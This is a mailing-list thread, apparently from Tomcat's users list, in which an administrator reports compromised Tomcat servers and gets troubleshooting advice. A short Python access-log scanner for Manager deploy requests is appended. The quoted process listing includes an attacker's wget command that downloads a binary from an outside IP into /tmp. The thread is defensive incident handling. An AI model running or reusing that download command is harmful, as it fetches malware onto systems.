sorry, but I forgot to post:

/usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

Regards.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>

2014-04-29 17:41 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:

> Hello Dan,
>
> Nop, the attacker is executing locally the following:
>
> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And then it launches squid, which tries to connect via ssh to various places.
>
> Right now it's time to leave the office, but in a few hours I will paste in
> pastebin access logs, config files, whatever you tell me.
>
> This is my pstree:
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
>      ├─atop
>      ├─crond
>      ├─dbus-daemon
>      ├─events/0
>      ├─events/1
>      ├─events/2
>      ├─events/3
>      ├─httpd───8*[httpd]
>      ├─irqbalance
>      ├─2*[iscsid]
>      ├─iscsiuio───3*[{iscsiuio}]
>      ├─java─┬─sh───wget
>      │      └─263*[{java}]
>      ├─khelper
>
> By the way, logfiles are really big, 200 mb each one, I'll try to set up a
> dropbox account so I can share them.
>
> Thanks and regards
>
> Regards.-
> Leonardo Santagostini
> <http://ar.linkedin.com/in/santagostini>
>
>
> 2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>:
>
>> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <lsantagost...@gmail.com> wrote:
>>
>> > Hello list,
>> >
>> > I'm facing an issue in 6 tomcat servers that are getting penetrated and they
>> > are executing malicious scripts on my server.
>>
>> Can you share more about what they are doing? It might give some clues
>> as to how they are accessing your machines. For example, if they are
>> deploying a WAR file to your server, it could mean that they have access to
>> the Manager application on your server.
>>
>> Any details you can share might be helpful.
>>
>> > I'm using 7.0.53 on my servers. Running Centos 5.8
>> >
>> > Let me know what information you need.
>>
>> Do you have an access log? If not, enable one. If the attacker is not
>> deleting it, it could show you more about who they are and what requests
>> they are executing to access your server. Assuming they are entering
>> through your application and not some other way.
>>
>> Dan
>>
>> > PS: This is my first mail to this list, so I apologize for this not
>> > gentle presentation.
>> >
>> > Regards.-
>> > Leonardo Santagostini
>> >
>> > <http://ar.linkedin.com/in/santagostini>
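Dan's suggestion above, reading the access log for requests that deployed something through the Manager application, as an added example that is not part of this thread: a small Python scanner over constructed log lines in Tomcat's default AccessLogValve format that flags Manager upload/deploy/undeploy requests and the client addresses behind them. The hosts, user name, paths and timestamps in the sample are made up for the example.

```python
import re
from collections import Counter

# Constructed sample lines in Tomcat's default AccessLogValve pattern
# (%h %l %u %t "%r" %s %b). Hosts, user, paths and times are made up
# for this example; nothing here is taken from the reporter's logs.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2014:03:12:01 -0300] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - admin [27/Apr/2014:03:12:04 -0300] "GET /manager/html HTTP/1.1" 200 16340
203.0.113.7 - admin [27/Apr/2014:03:12:19 -0300] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17118
203.0.113.7 - admin [27/Apr/2014:03:13:02 -0300] "PUT /manager/text/deploy?path=/x&update=true HTTP/1.1" 403 2198
198.51.100.2 - - [27/Apr/2014:09:00:00 -0300] "GET /myapp/index.html HTTP/1.1" 200 1024
"""

# One access-log record: host, ident, user, timestamp, request line, status, bytes.
LINE_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+)(?: (\S+))?" (\d{3}) (\S+)$')

# Manager commands that change what is deployed (HTML and text interfaces).
# A plain GET /manager/html is read-only and is deliberately not matched.
MANAGER_WRITE = re.compile(
    r'^/manager/(?:html/(?:upload|deploy|undeploy|reload|start|stop)'
    r'|text/(?:deploy|undeploy|reload|start|stop))(?:[/?]|$)')

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, _ident, user, ts, method, path, _proto, status, _size = m.groups()
    return {"host": host, "user": user, "time": ts, "method": method,
            "path": path, "status": int(status)}

def find_manager_writes(log_text):
    """Return every record that hit a Manager deploy/undeploy endpoint.
    'accepted' is True for HTTP 200, i.e. the request authenticated and was
    handled (the HTML manager reports failures in the page body, still with 200);
    a 401/403 is an attempt the container rejected, still worth knowing about."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and MANAGER_WRITE.match(rec["path"]):
            rec["accepted"] = rec["status"] == 200
            hits.append(rec)
    return hits

def hosts_by_hits(hits):
    """Count Manager write attempts per client address."""
    return Counter(h["host"] for h in hits)
```

On a real server, pass the contents of each localhost_access_log file to find_manager_writes and review the accepted hits first; an unfamiliar client address with an accepted upload or deploy is the request to trace back from.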